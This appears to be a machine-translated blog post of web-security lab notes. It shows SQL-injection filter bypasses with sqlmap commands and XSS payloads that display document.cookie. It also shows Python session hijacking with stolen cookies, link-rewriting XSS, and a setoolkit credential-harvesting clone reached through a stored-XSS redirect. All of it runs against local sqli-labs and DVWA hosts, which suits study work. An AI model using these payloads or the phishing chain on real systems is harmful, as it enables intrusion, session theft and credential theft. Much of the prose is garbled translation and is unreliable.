Webセキュリティ攻撃と守備の学習--08-(Webリンクを改ざんバイパスSQLインジェクション、XSSのクロスサイトスクリプティングの分類、使用クッキーセッションハイジャック、XSS)

1、SQLインジェクションをバイパス

SQLインジェクションバイパスコメント文字の削除
アクションブレーク注:アクションをコード記述の部分をマーキングするためには、機能コードの役割を果たしています。しかし、コメント内容は実行されません。

ノートでのMySQL:(Pythonでのステートメントのための規則)

  • 1.単一行コメント: - +または - スペースや#
  • 2.複数行コメント:/ *複数行コメントの内容* /

通常のSQLステートメントの場合、ノートは、役割の説明として機能します。ただし、SQLインジェクションのプロセスで使用するために、単一引用符のコメント文字はシングル、多機能ブラケットを括弧、複数の単一および二重引用符、閉じ果たしました。

成功裏に近いフィルタ単一引用符は、の考え方に変更することはできませんシンボルの使用を注意してください使用してか「1」=「1つの閉じ単一引用符

http://127.0.0.1/sqli/Less-23/?id=1' - +

除くと、バイパスやSQLインジェクションと
MySQLの基本:

  • 1.MySQLの大文字と小文字を区別しない、大文字と小文字
  • 進URLをエンコードし、2.MySQLでデコードすることができます
  • 3.シンボルとキーワードや変換を&&交換する、またはに変換||

ここに画像を挿入説明
SQLMAPプローブ

パイソンsqlmap.py -u「http://127.0.0.1/sqli/Less-25/?id=1」--dbs --batch

ここに画像を挿入説明
SQLインジェクションの除去スペースバイパス

  • コーディング:進を、でurlencode
  • URLエンコードのスペースの20%
  • TAB URL 09パーセントをコードします

URLエンコードします。https://www.w3school.com.cn/tags/html_ref_urlencode.html

SQLMAPプローブ

時々 、文字データの損失につながる可能性がある問題をコードする、あなたが避けるために、六角機能を使用することができる
のpython sqlmap.py -u「http://127.0.0.1/sqli/Less-25/?id=1」を--hex --dbs --batch
ここに画像を挿入説明

2、XSSのクロスサイトスクリプティングのカテゴリー

XSSの脆弱性が紹介
XSS(クロスサイトスクリプティング)、順番ではない混乱略語とカスケーディングスタイルシート(カスケードスタイルシート)に、それはXSS XSSと略記されます。悪意のある攻撃者は、悪意のあるユーザーの目的を達成するように、ユーザーの訪問は、Webスクリプトコード内に埋め込まれたページが、実行されるWebページのコードに悪意のあるスクリプトを挿入します。(前端部)

はじめにクッキー
クッキーは、HTTPプロトコルであり、サーバーやスクリプトは、クライアントワークステーション情報の道を維持することができます。クッキーは、ユーザーに関する情報を含むことができ、ユーザーのブラウザ(クライアント)上のWebサーバによって保存される小さなテキストファイルです

HTTPはステートレスなプロトコルであるので、ネットワーク接続から、単一のサーバは、顧客の身元を知ることができません。どのようにそれを行うには?それを与えたクライアントは、許可証、人、訪問は自分のパスポートを持参しなければならないに関係なく発行しました。そこで、サーバは、パスからの顧客の身元を確認できること。これはクッキーの動作原理です。

反射型XSS
反射XSSも非永続的XSSとして知られている、このような攻撃は、多くの場合、使い捨て持っています

XSSのコードが含まれていますリンク攻撃者がメールで送信され、ユーザーがクリックは、サーバがユーザの要求を受け入れ、処理され、XSSを持つユーザーにコードを送信し、通常のユーザー、したいです。ユーザーのブラウザは、コード、トリガXSSの脆弱性を解析します。

ここに画像を挿入説明
ここに画像を挿入説明
ここに画像を挿入説明
クッキーの出力値

输入下面语句提交之后会如下图显示cookie

<script>alert(document.cookie)</script>

ここに画像を挿入説明
蓄積型XSSの
も、永続的なXSS型のXSSとして知られているストレージ・タイプは、攻撃スクリプトは、ターゲット・データベース・サーバーに格納されている、より多くの隠されました

XSS攻撃コードを掲示するプロセスに組み込まれた攻撃者フォーラム、ブログ、メッセージボードは、ポストは、データベースに格納されたターゲット・サーバーました。時にユーザが行う通常のアクセス、XSSコードを引き起こしました。

输入下面语句提交之后会如下图显示cookie
<script>alert(document.cookie)</script>

ここに画像を挿入説明
DOM XSSタイプ
DOM XSSは、更新された文書の内容、構造およびスタイルへの動的アクセスを使用して完全な名前のドキュメントオブジェクトモデル、DOMを入力します。

サーバーの応答は、攻撃者がスクリプトを扱っていないが、ユーザーのブラウザは、この応答に対処する際に、DOMオブジェクトは、トリガXSSの脆弱性へのXSSコードを扱います。

在浏览器最后输入下面语句提交之后会如下图显示cookie
?default=%20<script>alert(document.cookie)</script>

ここに画像を挿入説明

3、Pythonのクッキーセッションハイジャックを使用することにより、

いくつかのサイトをクロールすると、ログインが必要な、我々は、クッキー情報を使用する必要が着陸した後、直接情報をクロールし、以前に学びました。

cookie = "security=low; csrftoken=EIe9fIFCRE4BXu8bqHKRX60hfih1bZAnMFMA8w2DtTygLGXcemxxiAyeAqsJPXhi; PHPSESSID=g2ii9pn9u0sck0shjvcqtfgne0"

cookie = {i.split("=")[0]:i.split("=")[1] for i in cookie.split("; ")}

html = requests.get('http://127.0.0.1/DVWA/index.php',headers=headers).text
import requests

headers = {
    "Cookie": "security=low; PHPSESSID=0dku74vnkiotb4f2oecffhotc0"    
}

html = requests.get("http://127.0.0.1/dvwa/", headers=headers).text
print(html)

セッションハイジャックした後の動作

  • ページデータを取得する1
  • 2.フロントエンドロジックハイジャック
  • 3.送信要求
  • 4.ユーザー情報を盗みます
  • 5.ユーザパスワードとログイン状態を盗みます

4、XSSはWebリンクを改ざん

<script>
window.onload = function(){
    var link = document.getElementsByTagName("a");
    for(j=0;j<link.length;j++){
        link[j].href = "http://www.baidu.com";
    }
}
</script>

ここに画像を挿入説明
ここに画像を挿入説明

XSSは、ユーザー情報の原則盗むために
ユーザーの訪問は、クローニングサイトのログインページにジャンプし、ユーザのログインアカウントとパスワード保存されているを入力する場合はXSSのジャンプコード保存された設定を使用して、クローニングサイトのログインページを。

setookieツールクローニング部位の
カリで入力setoolkit
1.ソーシャルエンジニアリング攻撃> 1
2.攻撃者のWebサイト> 2回の
3.資格ハーベスト攻撃> 3
4.rootウェブサイトクローン> 2
ここに画像を挿入説明
保存されたXSSジャンプクローニング部位
XSSでDVWA中(格納)実行

<script>
window.location = "http://192.168.154.130/";
</script>
公開された60元の記事 ウォンの賞賛9 ビュー5038

おすすめ

転載: blog.csdn.net/weixin_42118531/article/details/104669686